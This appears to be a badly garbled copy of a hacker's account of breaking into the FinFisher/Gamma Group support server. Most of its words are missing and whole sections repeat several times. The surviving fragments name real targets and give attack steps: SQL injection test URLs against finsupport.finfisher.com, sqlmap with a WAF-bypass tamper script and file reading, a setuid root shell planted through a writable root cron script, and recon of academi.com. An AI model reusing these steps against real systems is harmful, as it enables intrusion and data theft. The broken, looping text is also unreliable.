    Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

    , , .

    . : , LFI, JavaScript-, - Location, .

    finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

    https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

    , print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

    , , , . , .

    ( )

    ___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

    root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

    finsupport Debian, , unix-privesc-check :

    WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

    /etc/cron.hourly/webalizer :

    chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

    , ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

    , . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

    , . . . :

    Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

    Gamma , , FinSpy , , , , Twitter-.

    : , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

    , , , . , .

    1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

    , , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

    2) , 95% , . : " ". , , , .

    40 . , PGP- , . GitHub, : https://github.com/FinFisher .


    Hacker News Reddit

    https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


    The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

, FinFisher . , , .

. , - -. .


, - - , :

Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

Whonix, - , , , - . - .

: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

fierce , whois- IP- .

Blackwater. - (academi.com). :

fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

whois- www.academi.com , Amazon Web Service.

NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

IP-, fierce.pl , fierce.pl -dns - IP-. , , .

Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

whois- , academiproshop.com , .

FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

, . , , , , .

nmap- IP- . SNMP-.


-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

- . , , nmap , :

-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

finsupport.finfisher.com :

nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

, - : " , - , Gamma Group... "
, , , . :

Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

, , .

. : , LFI, JavaScript-, - Location, .

finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

, , , . , .

( )

___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

finsupport Debian, , unix-privesc-check :

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

/etc/cron.hourly/webalizer :

chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

, . . . :

Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

Gamma , , FinSpy , , , , Twitter-.

: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

, , , . , .

1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

2) , 95% , . : " ". , , , .

40 . , PGP- , . GitHub, : https://github.com/FinFisher .


Hacker News Reddit

https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
  1. C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


    40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

    , FinFisher . , , .

    . , - -. .


    , - - , :

    Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

    Whonix, - , , , - . - .

    : , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

    fierce , whois- IP- .

    Blackwater. - (academi.com). :

    fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

    whois- www.academi.com , Amazon Web Service.

    NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

    whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

    "850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

    IP-, fierce.pl , fierce.pl -dns - IP-. , , .

    Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

    whois- , academiproshop.com , .

    FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

    , . , , , , .

    nmap- IP- . SNMP-.


    -, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

    - . , , nmap , :

    -. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

    finsupport.finfisher.com :

    nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

    , - : " , - , Gamma Group... "
    , , , . :

    Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

    , , .

    . : , LFI, JavaScript-, - Location, .

    finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

    https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

    , print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

    , , , . , .

    ( )

    ___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

    root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

    finsupport Debian, , unix-privesc-check :

    WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

    /etc/cron.hourly/webalizer :

    chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

    , ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

    , . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

    , . . . :

    Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

    Gamma , , FinSpy , , , , Twitter-.

    : , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

    , , , . , .

    1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

    , , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

    2) , 95% , . : " ". , , , .

    40 . , PGP- , . GitHub, : https://github.com/FinFisher .


    Hacker News Reddit

    https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


    The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
  2. C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


    40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

    , FinFisher . , , .

    . , - -. .


    , - - , :

    Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

    Whonix, - , , , - . - .

    : , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

    fierce , whois- IP- .

    Blackwater. - (academi.com). :

    fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

    whois- www.academi.com , Amazon Web Service.

    NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

    whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

    "850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

    IP-, fierce.pl , fierce.pl -dns - IP-. , , .

    Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

    whois- , academiproshop.com , .

    FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

    , . , , , , .

    nmap- IP- . SNMP-.


    -, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

    - . , , nmap , :

    -. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

    finsupport.finfisher.com :

    nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

    , - : " , - , Gamma Group... "
    , , , . :

    Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

    , , .

    . : , LFI, JavaScript-, - Location, .

    finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

    https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

    , print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

    , , , . , .

    ( )

    ___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

    root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

    finsupport Debian, , unix-privesc-check :

    WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

    /etc/cron.hourly/webalizer :

    chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

    , ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

    , . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

    , . . . :

    Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

    Gamma , , FinSpy , , , , Twitter-.

    : , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

    , , , . , .

    1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

    , , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

    2) , 95% , . : " ". , , , .

    40 . , PGP- , . GitHub, : https://github.com/FinFisher .


    Hacker News Reddit

    https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


    The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
  3. C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


    40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

    , FinFisher . , , .

    . , - -. .


    , - - , :

    Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

    Whonix, - , , , - . - .

    : , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

    fierce , whois- IP- .

    Blackwater. - (academi.com). :

    fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

    whois- www.academi.com , Amazon Web Service.

    NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

    whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

    "850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

    IP-, fierce.pl , fierce.pl -dns - IP-. , , .

    Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

    whois- , academiproshop.com , .

    FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

    , . , , , , .

    nmap- IP- . SNMP-.


    -, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

    - . , , nmap , :

    -. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

    finsupport.finfisher.com :

    nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

    , - : " , - , Gamma Group... "
    , , , . :

    Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

    , , .

    . : , LFI, JavaScript-, - Location, .

    finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

    https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

    , print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

    , , , . , .

    ( )

    ___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

    root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

    finsupport Debian, , unix-privesc-check :

    WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

    /etc/cron.hourly/webalizer :

    chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

    , ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

    , . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

    , . . . :

    Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

    Gamma , , FinSpy , , , , Twitter-.

    : , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

    , , , . , .

    1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

    , , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

    2) , 95% , . : " ". , , , .

    40 . , PGP- , . GitHub, : https://github.com/FinFisher .


    Hacker News Reddit

    https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


    The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
  4. C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


    40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

    , FinFisher . , , .

    . , - -. .


    , - - , :

    Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

    Whonix, - , , , - . - .

    : , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

    fierce , whois- IP- .

    Blackwater. - (academi.com). :

    fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

    whois- www.academi.com , Amazon Web Service.

    NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

    whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

    "850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

    IP-, fierce.pl , fierce.pl -dns - IP-. , , .

    Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

    whois- , academiproshop.com , .

    FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

    , . , , , , .

    nmap- IP- . SNMP-.


    -, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

    - . , , nmap , :

    -. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

    finsupport.finfisher.com :

    nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

    , - : " , - , Gamma Group... "
    , , , . :

    Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

    , , .

    . : , LFI, JavaScript-, - Location, .

    finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

    https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

    , print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

    , , , . , .

    ( )

    ___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^

    root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .

    finsupport Debian, , unix-privesc-check :

    WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer

    /etc/cron.hourly/webalizer :

    chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell

    , ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .

    , . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .

    , . . . :

    Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .

    Gamma , , FinSpy , , , , Twitter-.

    : , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !

    , , , . , .

    1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .

    , , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.

    2) , 95% , . : " ". , , , .

    40 . , PGP- , . GitHub, : https://github.com/FinFisher .


    Hacker News Reddit

    https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/


    The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
  5. C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 22, 53, 80, 443, 4111 ( - ).


    40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)

    , FinFisher . , , .

    . , - -. .


    , - - , :

    Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.

    Whonix, - , , , - . - .

    : , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .

    fierce , whois- IP- .

    Blackwater. - (academi.com). :

    fierce.pl -dns academi.com email.academi.com extranet.academi.com mail.academi.com secure.academi.com vault.academi.com www.academi.com

    whois- www.academi.com , Amazon Web Service.

    NetRange: - CIDR: CustName: Blackwater USA Address: 850 Puddin Ridge Rd

    whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:

    "850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools

    IP-, fierce.pl , fierce.pl -dns - IP-. , , .

    Google . , academi.com , - : careers.academi.com academiproshop.com te.academi.com property.academi.com teams.academi.com

    whois- , academiproshop.com , .

    FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .

    , . , , , , .

    nmap- IP- . SNMP-.


    -, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?

    - . , , nmap , :

    -. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .

    finsupport.finfisher.com :

    nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .

    , - : " , - , Gamma Group... "
    , , , . :

    Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.

    , , .

    . : , LFI, JavaScript-, - Location, .

    finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,

    https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

    , print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .

    , , , . , .

    ( )

